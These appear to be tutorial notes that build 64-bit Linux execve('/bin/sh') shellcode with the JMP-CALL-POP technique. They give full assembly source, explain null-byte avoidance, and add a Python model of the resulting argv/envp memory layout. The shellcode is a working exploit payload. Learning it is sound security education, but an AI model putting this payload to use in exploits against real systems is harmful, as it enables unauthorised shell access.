Shellcode 1 -> execve(/bin/sh) JMP CALL POP
We will use the JMP-CALL-POP technique to find the address of /bin/sh and make RDI point to it.
Then we add a null byte after it so the string is terminated.
RDX needs to point to a place where 8 bytes of 0 are stored (envp).
RSI needs to point to an 8-byte slot holding the address of /bin/sh, followed by 8 bytes of 0 (argv).
Shellcode becomes:
global _start
section .text

_start:
    jmp find_address            ; jump forward, past the string

shellcode:
    xor rax, rax                ; rax = 0 without a null byte in the encoding
    ; Get the address of the string (the return address pushed by call)
    pop rdi
    ; Convert the A -> 0x0 to null terminate the string
    mov byte [rdi + 7], al
    ; Copy the address of the string in RDI to BBBBBBBB (argv[0])
    mov [rdi + 8], rdi
    ; copy the NULL 0x0000000000000000 -> CCCCCCCC (argv[1], also used as envp)
    mov [rdi + 16], rax
    ; Setup the addresses
    lea rsi, [rdi + 8]          ; rsi = argv
    lea rdx, [rdi + 16]         ; rdx = envp
    add rax, 59                 ; execve on x86-64 Linux
    syscall

find_address:
    call shellcode              ; pushes the address of shell_path_string

shell_path_string: db "/bin/shABBBBBBBBCCCCCCCC"
Note: this may fail at runtime, because the stores into the string fault when the defined bytes live in a .text section that is not writable. In that case we have to ensure that our shellcode can edit the defined bytes in the text section. If that is not possible, an alternative is to place the null byte directly after /bin/sh in the defined bytes, find another way to make RSI point to the address of /bin/sh followed by 8 bytes of 0s, and set RDX from RAX, which is already 0 (execve accepts a NULL envp).
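To see what the three stores actually build in memory, here is an added Python model (not part of the original notes) that applies the same writes to the 24-byte string at a constructed base address and then decodes the filename, argv and envp that execve would receive; BASE is an assumed value standing in for the address popped into RDI.

```python
"""Model the memory layout the JMP-CALL-POP execve shellcode builds.

Added example, not from the original notes: apply the shellcode's three
stores to the 24-byte string at a constructed base address, then decode
what execve() sees through rdi, rsi and rdx.
"""
import struct

TEMPLATE = b"/bin/shABBBBBBBBCCCCCCCC"  # the bytes defined after the call
BASE = 0x401020                          # constructed address popped into rdi


def has_null_bytes(code: bytes) -> bool:
    """True if a 0x00 byte is present (why 'A' stands in for the terminator)."""
    return b"\x00" in code


def apply_stores(template: bytes, base: int) -> bytearray:
    """mov byte [rdi+7], 0 ; mov [rdi+8], rdi ; mov [rdi+16], 0 with rdi = base."""
    buf = bytearray(template)
    buf[7] = 0                             # 'A' -> NUL terminator of "/bin/sh"
    buf[8:16] = struct.pack("<Q", base)    # BBBBBBBB -> argv[0] = &"/bin/sh"
    buf[16:24] = struct.pack("<Q", 0)      # CCCCCCCC -> argv[1] = NULL (also envp[0])
    return buf


def decode_execve_args(buf: bytearray, base: int) -> dict:
    """Walk the pointer arrays as the kernel would: rsi = base+8, rdx = base+16."""
    def read_ptr(addr: int) -> int:
        off = addr - base
        return struct.unpack("<Q", buf[off:off + 8])[0]

    def read_cstr(addr: int) -> bytes:
        off = addr - base
        return bytes(buf[off:buf.index(0, off)])

    def read_ptr_array(addr: int) -> list:
        out = []
        while (p := read_ptr(addr)) != 0:   # a NULL pointer terminates the array
            out.append(read_cstr(p))
            addr += 8
        return out

    return {"filename": read_cstr(base),
            "argv": read_ptr_array(base + 8),
            "envp": read_ptr_array(base + 16)}
```

The 8 zero bytes at BASE+16 do double duty: they terminate argv and are the (empty) envp array RDX points to.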